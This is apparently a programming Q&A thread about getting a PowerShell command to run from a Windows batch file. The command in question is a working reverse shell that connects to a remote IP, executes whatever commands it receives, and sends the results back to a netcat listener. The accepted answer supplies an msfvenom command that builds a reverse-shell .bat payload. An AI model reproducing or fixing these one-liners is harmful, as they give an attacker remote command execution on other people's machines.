# Execute PowerShell as batch file

Tags: powershell, batch-file, cmd, syntax, escaping

I'm trying to run the below reverse shell PowerShell command using a `.bat` file.

```
powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"
```

First, I start the netcat listener in Kali:

```
nc -vv -l -p 4777
```

I then run the PowerShell command, but I get the following error in Windows 10:

```
    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken
```

I've tried many possible `'`, `"` and ``` [combinations](https://stackoverflow.com/questions/54066930/how-to-run-powershell-on-one-line) and [variations](https://stackoverflow.com/questions/22258668/how-to-condense-powershell-script-to-fit-on-a-single-line), both in and encasing the command. I'm totally stumped.

Comment: Can you please help us? I suggest you to expand your PowerShell code and write it in a `ps1` file. Is it working? If not, then this is not a batch file problem!

Comment: Is it possible it is an extra semi-colon after the opening bracket of the while loop?  The first error seems to indicate the $x variable is not resolving correctly.  That could be an additional syntax issue?

Comment: If you want to combine batch and powershell in one file you might want to look at this: https://ss64.org/viewtopic.php?pid=9859#p9859

Answer (score 1):

Found myself into the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. I doesn't make sense at all.

Metasploit is our friend here:

```
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
```

Source:
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/